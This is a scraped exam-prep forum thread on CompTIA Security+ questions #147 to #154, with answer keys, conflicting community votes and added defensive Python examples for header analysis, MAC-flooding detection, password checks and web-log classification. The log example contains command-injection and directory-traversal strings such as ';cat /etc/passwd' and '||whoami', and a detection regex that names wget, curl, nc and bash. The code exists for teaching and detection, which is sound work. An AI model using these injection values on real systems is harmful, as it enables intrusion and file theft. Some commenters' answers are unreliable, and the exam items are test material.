The URL you provided states, "Please note that email headers can be spoofed and are not always reliable. " Wouldn't that make answer A
unreliable?
upvoted 2 times
Sandon 1 week, 4 days ago
Yes, yes it would
upvoted 2 times
ostralo 3 months, 3 weeks ago
I concur
return path verification is a must.
upvoted 1 times
Bl1024 Most Recent 3 days, 13 hours ago
Selected Answer: D
Spoofing makes all other answers unreliable
upvoted 1 times
ronniehaang 4 days, 5 hours ago
Selected Answer: A
A help desk technician should follow best practices in email security to validate the authenticity of the email. One of the best ways to validate the
authenticity of an email is to check the metadata in the email header and verify the From: line matches the CIO's email address. Additionally, the
technician can hover the mouse over the CIO's email address to verify the email address, which will show the actual email address the email was
sent from. If there is any doubt about the authenticity of the email, the technician can also forward the email to the CIO and ask if the CIO sent
the email requesting the documents.
upvoted 1 times
Boubou480 4 weeks ago
Selected Answer: C
To validate the authenticity of the email, the technician should check the metadata in the email header and verify that the "From:" line matches
the CIO's email address. The "From:" line in the email header indicates the sender of the email, and it is important to verify that it matches the
expected email address for the CIO. This will help to ensure that the email is legitimate and not a phishing attempt or a spoofed email. Checking
the metadata in the email header of the received path in reverse order to follow the email's path is not a reliable way to verify the authenticity of
the email. Hovering the mouse over the CIO's email address to verify the email address may not be sufficient, as it is possible to create a fake
email address that appears legitimate when hovered over. Forwarding the email to the CIO and asking if the CIO sent the email requesting the
documents is a good idea, but it is not the only step that should be taken to verify the authenticity of the email.
upvoted 1 times
FMMIR 1 month, 3 weeks ago
Selected Answer: C
I believe the answer is C:
To validate the authenticity of the email, the help desk technician should look at the metadata in the email header and verify the "From:" line
matches the CIO's email address. The email header contains information about the email's path and sender, and examining this information can
help to determine whether the email is genuine or not. In particular, the "From:" line should match the CIO's email address, and if it does not, this
may indicate that the email is not legitimate. Checking the metadata in the email header is a more reliable way to validate the authenticity of the
email than hovering the mouse over the CIO's email address or forwarding the email to the CIO and asking if it was sent by them.
upvoted 1 times
Blueteam 2 months, 2 weeks ago
Option A is correct.
Search for "How to scan email headers for phishing and malicious content".
https://resources.infosecinstitute.com/topic/how-to-scan-email-headers-for-phishing-and-malicious-content/
upvoted 1 times
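Added example for this question (not code from ExamTopics, CompTIA or any commenter): a Python walk through the headers of a phishing-style message, combining what options A and C describe (the Received: chain read bottom-up, the From: address) with the Return-Path, Reply-To and the SPF/DKIM/DMARC verdicts a receiving gateway stamps into Authentication-Results. The message, hosts, addresses and IPs are constructed for the example.

```python
"""Walk the headers of a suspicious e-mail, as options A and C describe.

Added example for the Question #147 thread; not code from ExamTopics or
CompTIA. The message, hosts, addresses and IPs are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed: the display name claims the CIO; the envelope sender, Reply-To,
# receiving chain and authentication results say otherwise.
SAMPLE = """\
Return-Path: <bounce@attacker.example.net>
Received: from attacker-relay.example.net (attacker-relay.example.net [198.51.100.7]) by mx.corp.example with ESMTPS; Fri, 3 Feb 2023 09:00:01 +0000
Received: from [192.0.2.10] (unknown [192.0.2.10]) by attacker-relay.example.net with ESMTP; Fri, 3 Feb 2023 08:59:58 +0000
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=attacker.example.net; dkim=none; dmarc=fail header.from=corp.example
From: "Jane Doe (CIO)" <cio@corp.example>
Reply-To: <jane.doe.cio@mail-attacker.example.net>
To: helpdesk@corp.example
Subject: Need the vendor contracts today

Please send the signed vendor contracts as soon as you can.
"""


def domain_of(header_value):
    """'Name <user@host>' -> 'host' (lower-cased); '' if absent."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def received_chain(msg):
    """(from, by) pairs oldest first, i.e. the path the message travelled.

    Each MTA prepends its Received: header, so the topmost one is the last
    hop. Reading bottom-up (reverse order, as option A says) follows the mail
    from its origin to our gateway."""
    hops = []
    for h in reversed(msg.get_all("Received", [])):
        frm = re.search(r"\bfrom\s+(\S+)", h)
        by = re.search(r"\bby\s+(\S+)", h)
        hops.append((frm.group(1) if frm else "?", by.group(1) if by else "?"))
    return hops


def auth_results(msg):
    """{'spf': 'fail', 'dkim': 'none', 'dmarc': 'fail'} from Authentication-Results."""
    results = {}
    for h in msg.get_all("Authentication-Results", []):
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", h, re.I):
            results[method.lower()] = verdict.lower()
    return results


def analyze(raw):
    """Collect the indicators a help desk analyst would check, with reasons."""
    msg = message_from_string(raw)
    from_dom = domain_of(msg.get("From"))
    rp_dom = domain_of(msg.get("Return-Path"))
    reply_dom = domain_of(msg.get("Reply-To")) or from_dom
    auth = auth_results(msg)
    hops = received_chain(msg)

    reasons = []
    if rp_dom and rp_dom != from_dom:
        reasons.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")
    if reply_dom != from_dom:
        reasons.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    for method in ("spf", "dkim", "dmarc"):
        if method in auth and auth[method] != "pass":
            reasons.append(f"{method}={auth[method]}")
    # The first hop is where the message entered the mail system; mail sent
    # from the CIO's own mailbox would originate on a corp.example server.
    if hops and not hops[0][1].endswith(from_dom):
        reasons.append(f"message entered via {hops[0][1]}, not a {from_dom} server")

    return {
        "from_domain": from_dom,
        "return_path_domain": rp_dom,
        "hops": hops,
        "auth": auth,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

Everything below your own gateway's Received: and Authentication-Results: lines can be written by the sender, which is why several commenters end up at an out-of-band check (call the CIO): the header analysis tells you how much to distrust the message, it cannot prove the message genuine.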
J_Ark1 2 months, 4 weeks ago
Selected Answer: A
I think that it could be related to SSL and/or TLS, SSH; that's what the metadata could be referring to...
upvoted 1 times
CapJackSparrow 3 months, 2 weeks ago
Selected Answer: D
my company has us forward risky emails to the IT department..
upvoted 2 times
CertAddict69 3 months, 3 weeks ago
Replying to the email would do no good, because it will go to the return address on a potentially spoofed email. FORWARDING the email to the
CIO's address, will confirm that only someone who can login to that mailbox will be able to see the message?
upvoted 3 times
deeden 4 months, 2 weeks ago
Selected Answer: B
I believe majority of people here received a few spoofed emails in the past and most often just do option B as it is most efficient. I mean, unless
the actual email address is CIO.name@gmail.com then I would probably call the CIO mobile phone and perform verification, would you agree?
upvoted 2 times
Swarupam 4 months, 4 weeks ago
Selected Answer: A
A should be the correct approach
upvoted 3 times
j0n45 5 months ago
Selected Answer: D
But why not forwarding the mail to the CIO himself?
upvoted 3 times
CertAddict69 3 months, 3 weeks ago
I think you have it bang on here. Obviously Forwarding, not replying (Which could send the reply to someone who spoofed the address)
upvoted 1 times
banditring 5 months ago
Because someone else could be using his email, I'm thinking.
upvoted 2 times
CertAddict69 3 months, 3 weeks ago
if someone else is using his email, then none of these options work. If you suspect the account is compromised, you would call the user
and verify over the phone or another communication method that does not involve the email address.
upvoted 2 times
Sandon 1 week, 4 days ago
Very true
upvoted 1 times
Liftedkris 5 months ago
Why would you forward the email to the same email address you are trying to verify?
upvoted 3 times
Ranaer 3 weeks, 1 day ago
Forward isn't reply. If the source email just looks like the CIO's email, forwarding to the actual CIO's email wouldn't go to the scammer.
upvoted 1 times
CertAddict69 3 months, 3 weeks ago
Because when you forward it and type a specific email address, the email will go to that mailbox and only someone with access to that
mailbox will be able to read and reply to the email. Checking the headers for the From address could be forged and tracing the email back
will only find it's sending IP address, without 100% accuracy.
upvoted 1 times
Question #148 Topic 1

A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident
response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?

A. Red-team exercise

B. Capture-the-flag exercise

C. Tabletop exercise

D. Phishing exercise

Correct Answer: C

Community vote distribution


C (64%) D (27%) 9%

TR3Y Highly Voted 4 months, 1 week ago
A Cyber Security tabletop exercise is a discussion-based event (not real). If they are looking for a "real world" solution to validate their IRP, then the best option would be a "Red Team", as they can simulate a real-world event testing your organization's IRP. Let me know if I am missing something.
upvoted 6 times
03allen 3 months, 3 weeks ago
"without interrupting daily operation" would be the reason.
upvoted 3 times
MSCertifications Most Recent 1 week, 1 day ago
Selected Answer: D
I'll go with phishing
upvoted 1 times
nicekoda 1 month ago
Answer is Red team exercise. The actions are real world and intended to simulate the operational approach of a ransomware-style attack without
overwriting sensitive files.
upvoted 1 times
alwaysrollin247 1 month, 2 weeks ago
Selected Answer: A
Red Team exercises differ from penetration testing in that they don’t focus on a single application or system, but instead set out to exploit
multiple systems and potential avenues of attack. The gloves are off, and “Think like an attacker” is the rule of play. Usually, Red Teams are part
of your internal security team, though sometimes they can be from external or dedicated agencies. While thinking like an attacker, a Red Team
group acts as (and provides security feedback from the perspective of) a malicious threat or challenger. It’s up to the business’s dedicated
security team – the Blue Team – to provide a suitable response in detecting, combating, and weakening their opposition. Prior to the Red Team
exercise, it’s usual that the Blue Team won’t know the plan or what is coming. This is in order to make the exercise as realistic as possible.

https://www.imperva.com/blog/what-are-red-team-exercises-and-why-are-they-important/
upvoted 1 times
KingTre 1 month, 3 weeks ago
Selected Answer: D
Although tabletop is the most voted answer, "without interrupting daily operations" leads me to think D would be correct.

Tabletops involve physical participants to sit down and talk through incidents. This would take time and people away from daily operations.

A phishing tactic could be done by 1 security officer and sent out as a daily email. Correct me if I'm wrong.
upvoted 2 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: C
C is correct
upvoted 3 times
serginljr 4 months, 3 weeks ago
Selected Answer: C
C is the correct answer
upvoted 4 times
Question #149 Topic 1

Security analysts are conducting an investigation of an attack that occurred inside the organization's network. An attacker was able to collect
network traffic between workstations throughout the network. The analysts review the following logs:

The Layer 2 address table has hundreds of entries similar to the ones above. Which of the following attacks has MOST likely occurred?

A. SQL injection

B. DNS spoofing

C. MAC flooding

D. ARP poisoning

Correct Answer: C

Community vote distribution


C (100%)

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: C
Answer: MAC flooding

The question mentions that the table is on Layer 2, which is the Data Link layer. The data-link layer is where switches operate to move traffic. Switches use MAC addresses to find the physical address of the device. This is because the Layer 2 address (MAC address) will be unique on the local network.

MAC flooding is a cyber attack that overflows the MAC Table (Layer 2 Table) of switches by sending out invalid MAC addresses.

When a MAC Address table is full, the switch is no longer able to save new addresses, so it will enter into fail-open mode and begin broadcasting
data (like a hub) to all ports. This will allow an attacker to get data packets intended for another computer and be able to steal sensitive
information.
upvoted 5 times
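Added example for this question (not code from ExamTopics, CompTIA or any commenter; the exam's own log image is not reproduced): a Python parser for a Cisco IOS-style `show mac address-table` output that counts dynamically learned addresses per port, which is how the "hundreds of entries" in the question show up in practice, plus the port-security configuration that stops the switch from being pushed into fail-open. The table itself is generated inside the script for illustration; only the IOS column layout and the port-security command syntax are real, and the threshold of 20 addresses per access port is an assumption.

```python
"""Detect MAC flooding from a Layer 2 address table.

Added example for the Question #149 thread; not code from ExamTopics or
CompTIA. The table is generated below; only the Cisco IOS column layout and
the port-security command syntax are real.
"""
import re
from collections import Counter
from random import Random

# One row of `show mac address-table`: VLAN, dotted-hex MAC, type, port.
ROW = re.compile(
    r"^\s*(\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+(\w+)\s+(\S+)", re.I)


def build_sample_table(flooded_port="Gi0/5", count=300, seed=1):
    """Constructed table: three normal access ports plus one port that has
    learned `count` random addresses, the pattern a flooding tool leaves."""
    rng = Random(seed)
    lines = [
        "Vlan    Mac Address       Type        Ports",
        "----    -----------       --------    -----",
        "  10    0050.56aa.0001    DYNAMIC     Gi0/1",
        "  10    0050.56aa.0002    DYNAMIC     Gi0/2",
        "  20    0050.56aa.0003    DYNAMIC     Gi0/3",
    ]
    for _ in range(count):
        mac = ".".join(f"{rng.getrandbits(16):04x}" for _ in range(3))
        lines.append(f"  10    {mac}    DYNAMIC     {flooded_port}")
    return "\n".join(lines)


def parse_table(text):
    """Rows -> list of dicts; header and separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            vlan, mac, typ, port = m.groups()
            entries.append({"vlan": int(vlan), "mac": mac.lower(),
                            "type": typ.upper(), "port": port})
    return entries


def macs_per_port(entries):
    """Dynamically learned addresses per port (static entries are the admin's)."""
    return Counter(e["port"] for e in entries if e["type"] == "DYNAMIC")


def flooded_ports(entries, threshold=20):
    """Ports with more learned MACs than an access port should ever have.

    The threshold is an assumption for this example; uplinks and ports
    facing a hypervisor legitimately carry many addresses, so exclude trunks
    before alerting on them."""
    return {port: n for port, n in macs_per_port(entries).items() if n > threshold}


def port_security_config(port, maximum=2):
    """IOS port-security that caps learned MACs on the port and logs violations."""
    return "\n".join([
        f"interface {port}",
        " switchport mode access",
        " switchport port-security",
        f" switchport port-security maximum {maximum}",
        " switchport port-security violation restrict",
        " switchport port-security mac-address sticky",
    ])


if __name__ == "__main__":
    table = parse_table(build_sample_table())
    for port, n in flooded_ports(table).items():
        print(f"{port}: {n} dynamic MACs learned, likely flooding")
        print(port_security_config(port))
```

`violation restrict` drops frames from addresses beyond the maximum and raises a log/SNMP event while keeping the port up; `violation shutdown` err-disables the port instead, which is harsher but also ends the sniffing window immediately.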
deeden Most Recent 4 months, 2 weeks ago
Selected Answer: C
I agree with MAC flooding. Here's a good read about it and how to prevent.
https://www.omnisecu.com/ccna-security/what-is-mac-flooding-attack-how-to-prevent-mac-flooding-attack.php
upvoted 3 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: C
Hundreds of entries, I would assume it's flooding.
upvoted 3 times
_Tyler_ 4 months, 4 weeks ago
Selected Answer: C
All the other answers involve an attack that changes data that is already present; this question states that there are hundreds of entries, indicating flooding.
upvoted 4 times
ScottT 4 months, 3 weeks ago
and Layer 2 ruling out SQL and DNS
upvoted 1 times
Yuyuyakuza 5 months ago
Mac Flooding "Layer 2.."
upvoted 1 times
Question #150 Topic 1

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against
corporate credentials. Which of the following controls was being violated?

A. Password complexity

B. Password history

C. Password reuse

D. Password length

Correct Answer: A

Community vote distribution


A (87%) 7%

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: A
Answer: Password complexity

Password complexity is a measure of how difficult a password is to guess in relation to any number of guessing or cracking methods. For the security auditor to be able to successfully perform a dictionary attack, that means that the credentials were too predictable and were likely common passwords.
upvoted 5 times
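Added example for this question (not code from ExamTopics, CompTIA or any commenter): a Python check showing why a complexity rule on its own does not stop a dictionary attack. The mangling a cracker's rule set applies (capitalise, leet substitutions, append a year and a symbol) is reversed and the base word looked up, so "Summer2023!" passes the three-of-four-classes policy and still falls to the dictionary. The six-word `WORDLIST` is a constructed stand-in for rockyou-style lists.

```python
"""Why complexity alone does not stop a dictionary attack.

Added example for the Question #150 thread; not code from ExamTopics or
CompTIA. WORDLIST is a six-word stand-in for rockyou-style lists.
"""
import re

WORDLIST = {"password", "welcome", "summer", "company", "letmein", "dragon"}

# Undo the substitutions cracker rule sets apply ("P@ssw0rd" -> "password").
UNLEET = str.maketrans("43105$@", "aeiossa")

CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]")


def meets_complexity(pw, min_len=8, min_classes=3):
    """The classic policy: minimum length and three of four character classes."""
    classes = sum(bool(re.search(p, pw)) for p in CHAR_CLASSES)
    return len(pw) >= min_len and classes >= min_classes


def dictionary_base(pw, wordlist=WORDLIST):
    """Base word if `pw` is a mangled dictionary word, else None.

    Strips leading/trailing digits and symbols ("Summer2023!" -> "Summer"),
    reverses leet substitutions and lower-cases, which is roughly what a
    cracker's rule set does in the other direction."""
    core = re.sub(r"[\d\W_]+$", "", pw)
    core = re.sub(r"^[\d\W_]+", "", core)
    core = core.translate(UNLEET).lower()
    return core if core in wordlist else None


def evaluate(pw):
    """Both verdicts side by side: the policy's and the attacker's."""
    base = dictionary_base(pw)
    return {
        "complexity_ok": meets_complexity(pw),
        "dictionary_word": base,
        "accept": meets_complexity(pw) and base is None,
    }


if __name__ == "__main__":
    for pw in ("Summer2023!", "P@ssw0rd1", "dragon", "vT9#kq2Lx!"):
        print(pw, evaluate(pw))
```

The `accept` field is the control that actually answers the question: the word "summer" with a year and an exclamation mark satisfies every complexity rule, so only a check against a blocklist of common and breached passwords (the NIST recommendation quoted further down this thread) rejects it.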
xxxdolorxxx Most Recent 1 week, 5 days ago
Selected Answer: A
A makes the most amount of sense to me.
upvoted 1 times
NICKJONRIPPER 2 months, 1 week ago
Selected Answer: C
Passwords in a common dictionary are not necessarily not complex. In the well-known "/usr/share/wordlists/rockyou.txt" dictionary, we can find passwords like "arisDAN13032008", "arires_super13@hotmail.cpom"... So it's about reuse, not about complexity.
upvoted 1 times
Sandon 1 month, 3 weeks ago
That ain't it
upvoted 1 times
Gino_Slim 3 months, 1 week ago
Selected Answer: A
Not even sure how that one person got D. The answer is A all the way. Complexity refers to how the password needs to be formatted.
upvoted 1 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: A
It is A
upvoted 2 times
Ay_ma 4 months, 3 weeks ago
Selected Answer: D
According to guidance offered by the National Institute of Standards and Technology (NIST), password length is more important than password
complexity. This actually makes a lot of sense as longer passphrases take longer to crack, and they are easier to remember than a string of
meaningless characters.
NIST has provided a number of additional recommendations for organizations to follow, some of which include:

- Passphrases should consist of 15 or more characters.
- Uppercase, lowercase, or special characters are not required.
- Only ask users to change their passwords if you believe your network has been compromised.
- Check all new passwords against a list of passwords that are frequently compromised.
- Avoid locking your users out of their accounts after a number of unsuccessful login attempts, as hackers will often try to flood networks by
purposely trying incorrect passwords in order to lock users out of their accounts.
- Don’t allow password “hints.”

www.lepide.com

I'm inclined to go for option D
upvoted 1 times
rhocale 1 month, 2 weeks ago
This would make sense, except for the fact that it's a dictionary attack and the length of words won't stop a dictionary attack; it's still a basic word.
upvoted 1 times
RonWonkers 4 months, 2 weeks ago
This might be true but it does not answer the question.

The question is: Which of the following controls was being violated?
When using a standard word you violate complexity control.
upvoted 3 times
comeragh 5 months ago
Selected Answer: A
Agree with A here
upvoted 4 times
Question #151 Topic 1

A SOC operator is analyzing a log file that contains the following entries:

Which of the following explains these log entries?

A. SQL injection and improper input-handling attempts

B. Cross-site scripting and resource exhaustion attempts

C. Command injection and directory traversal attempts

D. Error handling and privilege escalation attempts

Correct Answer: C

Community vote distribution


C (100%)

stoneface Highly Voted 5 months ago
Selected Answer: C
C. Command injection and directory traversal attempts
upvoted 10 times
ScottT 4 months, 3 weeks ago
https://www.professormesser.com/security-plus/sy0-401/directory-traversal-and-command-injection-2/
upvoted 7 times
VendorPTS 4 months ago
Thank you. This was super helpful.
upvoted 3 times
rodwave Most Recent 2 months, 3 weeks ago
Selected Answer: C
Answer: Command injection and directory traversal attempts

Directory traversal is when an attacker uses the software on a web server to access data in a directory other than the server's root directory. If the
attempt is successful, the threat actor can view restricted files or execute commands on the server.

Command injection is an attack that involves executing commands on a host. Typically, the threat actor injects the commands by exploiting an
application vulnerability, such as insufficient input validation.

The attacker is attempting to traverse the directory of the host and execute the cat command which could be used to print the contents of a file.
upvoted 2 times
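Added example for this question (not code from ExamTopics, CompTIA or any commenter; the exam's own log image is not reproduced): Python detection logic run over constructed Apache-style access-log lines. Each request URL is URL-decoded until it stops changing, because attackers double-encode `../` as `%252e%252e%252f` to slip past a single-pass filter, and the decoded target is then matched for traversal sequences, a shell separator followed by a command name, and the sensitive files (`/etc/passwd`, `/etc/shadow`) that the `cat` in the thread's explanation is after. The log lines, IPs and paths are made up for the example.

```python
"""Classify web access-log entries as traversal / command injection.

Added example for the Question #151 thread; not code from ExamTopics or
CompTIA, and not the exam's own log (which is an image). The log lines are
constructed in Apache access-log layout.
"""
import re
from urllib.parse import unquote_plus

LOG = """\
203.0.113.9 - - [04/Feb/2023:19:26:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120
203.0.113.9 - - [04/Feb/2023:19:26:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 213
203.0.113.9 - - [04/Feb/2023:19:26:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 199
203.0.113.9 - - [04/Feb/2023:19:26:07 +0000] "GET /ping.cgi?host=127.0.0.1;cat+/etc/passwd HTTP/1.1" 200 2048
203.0.113.9 - - [04/Feb/2023:19:26:09 +0000] "GET /ping.cgi?host=127.0.0.1%7C%7Cwhoami HTTP/1.1" 200 128
203.0.113.9 - - [04/Feb/2023:19:26:12 +0000] "GET /ping.cgi?host=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 213
198.51.100.3 - - [04/Feb/2023:19:26:15 +0000] "GET /search?q=cat+pictures HTTP/1.1" 200 8001
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE)\s+(\S+)\s+HTTP/')
# "../" or "..\" anywhere in the decoded target
TRAVERSAL = re.compile(r"\.\.[/\\]")
# A shell separator followed by a command name. A lone "&" is deliberately
# left out: it is the query-string separator and would flag "&id=5".
CMD_INJECTION = re.compile(
    r"(?:;|\|\|?|&&|`|\$\()\s*(?:cat|ls|id|whoami|uname|wget|curl|nc|bash|sh|ping)\b",
    re.I)
# Files attackers read first to prove the hole.
SENSITIVE_FILE = re.compile(r"/etc/(?:passwd|shadow)\b|win\.ini|boot\.ini", re.I)


def decode_fully(s, rounds=3):
    """URL-decode until the string stops changing: "%252e" -> "%2e" -> ".".
    Double encoding is a standard trick against single-pass filters."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line):
    """Set of tags for one log line; an empty set means nothing matched."""
    m = REQUEST.search(line)
    if not m:
        return set()
    target = decode_fully(m.group(1))
    tags = set()
    if TRAVERSAL.search(target):
        tags.add("directory_traversal")
    if CMD_INJECTION.search(target):
        tags.add("command_injection")
    if SENSITIVE_FILE.search(target):
        tags.add("sensitive_file")
    return tags


def summarize(log):
    """[(line_number, sorted tags), ...] for the lines that matched."""
    out = []
    for n, line in enumerate(log.splitlines(), 1):
        tags = classify(line)
        if tags:
            out.append((n, sorted(tags)))
    return out


if __name__ == "__main__":
    for n, tags in summarize(LOG):
        print(f"line {n}: {', '.join(tags)}")
```

The last log line is the control: "cat pictures" contains the command name but no separator in front of it, so it is not flagged. Matching on the decoded target rather than the raw request is what lets line 6 (double-encoded) land in the same bucket as line 2.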
J_Ark1 2 months, 4 weeks ago
Selected Answer: C
When I saw 'Get' instantly I went for cmd injection and traversal attempts.
upvoted 2 times
Jossie_C 3 months ago
Selected Answer: C
The cat command traverses files in a directory.
upvoted 1 times
Sandon 1 week, 4 days ago
Negative ghost rider. The cat command displays the contents of a file.
upvoted 1 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: C
Agree with C
upvoted 2 times
comeragh 5 months ago
Selected Answer: C
Agree with C for this one
upvoted 3 times

Question #152 Topic 1

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be
avoided in the future.

B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.

C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.

D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

Correct Answer: A

Community vote distribution


A (100%)

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be
avoided in the future.

The final phase of the incident response is also called the lessons learned or remediation step.
=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 2 times
Jossie_C 3 months ago
Remediation AKA lessons learned
upvoted 1 times
deeden 4 months, 2 weeks ago
Selected Answer: A
https://playbooks.flexibleir.com/incident-response-phases-best-practices/
upvoted 2 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: A
I agree, the other steps were Identification, containment and recovery, It is A, lessons learned
upvoted 3 times
Danalyst 4 months, 3 weeks ago
'Lessons Learned'
upvoted 2 times
Question #153 Topic 1

HOTSPOT -
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS -
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Correct Answer:

cefibo Highly Voted 1 year, 11 months ago
Botnet->Enable DDoS protection
RAT->Disable remote access services
Worm-> Change default passwords
Keylogger->2FA using push
Backdoor->Code Review
upvoted 112 times
vi2 1 year, 9 months ago
I agree with this selection with the exception of the third. As the example given is a SQL database, I'd say 'Change default application password'.
upvoted 28 times


  leesuh 1 year, 9 months ago


I agree. Will go with this.
upvoted 6 times

  465ekm 1 year, 9 months ago


Will go with this too
upvoted 4 times

  etwe04 1 year, 8 months ago


Everything is right; just change Worm > Change application password
upvoted 11 times

  peymani 1 year, 10 months ago


proof for Keylogger -->2FA https://www.onelogin.com/learn/mfa-types-of-cyber-attacks
upvoted 3 times

  gottapass1sttry 1 year, 10 months ago


To remediate the worm, do I need to change system and app PWs? Does the PBQ allow for the selection of more than one remediation
option?
upvoted 1 times

  hanoi92 Highly Voted  1 year, 3 months ago


I think result
1. Web server ======> Botnet ===> Enable DDoS protection
2. User => RAT =====> Implement a host-based IPS
3. Database server ======> Worm ===> Change the default application password
4. Executive =====> Keylogger > Implement 2FA using push notification
5. Application =======> Backdoor > Conduct a code review
upvoted 14 times

  StillLearning Most Recent  5 days, 21 hours ago


Hi All, on Friday I did the exam and passed, thankfully. The first PBQ was how to generate an OpenSSH key in Linux. It also included the chmod commands for 777 and chmod 666; I think the first number was a 6.
PBQ 153 and 154 were the 2nd and 3rd questions. One thing I will say: know your stuff and use this site as a reference, as CompTIA is changing the questions. I would also recommend Professor Messer, who does a great job of explaining everything: https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/sy0-601-comptia-security-plus-course/ (you can also find this on YouTube). Best of luck to everyone, and thanks for your help and feedback; this is always a great source.
upvoted 6 times

  nul8212 1 month, 2 weeks ago


3.- Worm, Change the default application password
upvoted 1 times

  VendorPTS 4 months ago


Syn packets from multiple sources => WebServer => Botnet => Enable DDoS protection
Establishes a connection, allows remote commands => User => RAT => Implement host-based IPS (Trojans and RATs - CompTIA Security+ SY0-501 - 1.1 - Professor Messer IT Certification Training Courses)
Self-Propagating => Database Server => Worm => Change Default App Passwords
Hardware to remote monitor user input/credentials => Executive => KeyLogger => 2FA
Embeds hidden access, internally developed app => Application => Backdoor => Conduct Code Review
upvoted 1 times

  andrizo 3 months, 3 weeks ago


not liking ips vs disabling
upvoted 1 times

  VendorPTS 4 months ago


The hyperlink to RATs got lost in the post above. This was helpful to me.
https://www.professormesser.com/security-plus/sy0-501/trojans-and-rats/
upvoted 1 times

  tony9622 4 months, 1 week ago


How does 2FA push notifications prevent key logging?
upvoted 1 times

  andrizo 3 months, 3 weeks ago


possibly because even if they have your login, they cannot bypass a secondary authentication method with just a keylogger
upvoted 2 times

  irfana 6 months, 3 weeks ago


Just took SY0-601 Exam today and pass !!
**This question was on the test**
upvoted 8 times

  CLAW_ 7 months, 1 week ago


Passed last week Thursday with 800. This was the third question on the test. I went with -
Botnet->Enable DDoS protection
RAT->Disable remote access services
Worm-> Change default passwords
Keylogger->2FA using push
Backdoor->Code Review
upvoted 9 times

  Reactsean 7 months, 2 weeks ago


Definitely on the test
upvoted 2 times

  Incredible99 8 months ago


It was on 05/24/2022 exam
upvoted 1 times

  eddie_network_jedi 9 months ago


Appear on exam (May, the 3rd - 2022). Exam passed :)
upvoted 1 times

  hypertweeky 8 months, 4 weeks ago


Did you go with Cefibo’s answer? Congrats!
upvoted 1 times

  NaiveMind 9 months, 2 weeks ago


Just took the SY0-601 Exam today and PASS !!
This question was on the test. I chose the same as cefibo.
Thanks cefibo !!
upvoted 4 times

  Shady9731 10 months, 1 week ago


what is the difference between fuzzing and code review?
upvoted 1 times

  andrizo 3 months, 3 weeks ago


fuzzing is just input validation
upvoted 1 times

  greendoor 7 months, 4 weeks ago


in a nutshell: code review is static. fuzzing is dynamic code review.
upvoted 2 times

  Mickers 7 months, 1 week ago


So wouldn't fuzzing be the best overall solution? To avoid internal mistakes/misses?
upvoted 2 times

  Faithful_Revenant 11 months ago


I got this question.
upvoted 2 times

  syaldram 1 year, 1 month ago


I just passed the sec + and this was on the exam!
upvoted 7 times

  amuk21 1 year, 2 months ago


Botnet - Enable DDoS protection
RAT - Disable remote access
Worm - Change default application password
Keylogger - 2FA using Push
Backdoor - Code Review
upvoted 3 times

  Berlus 1 year, 2 months ago


BOTNET - Enable DDoS Protection
RAT - Disable Remote Access Services
WORM - Change Default Application Password
KEYLOGGER - 2FA
BACKDOOR - Conduct Code Review
upvoted 2 times


Question #154 Topic 1

SIMULATION -
A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

INSTRUCTIONS -
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Correct Answer: See explanation below.


Firewall 1:
DNS Rule - 10.0.0.1/24 --> ANY --> DNS --> PERMIT
HTTPS Outbound - 10.0.0.1/24 --> ANY --> HTTPS --> PERMIT
Management - ANY --> 10.0.0.1/24 --> SSH --> PERMIT
HTTPS Inbound - ANY --> 10.0.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound - ANY --> 10.0.0.1/24 --> HTTP --> DENY
Firewall 2:
DNS Rule - 10.0.1.1/24 --> ANY --> DNS --> PERMIT
HTTPS Outbound - 10.0.1.1/24 --> ANY --> HTTPS --> PERMIT
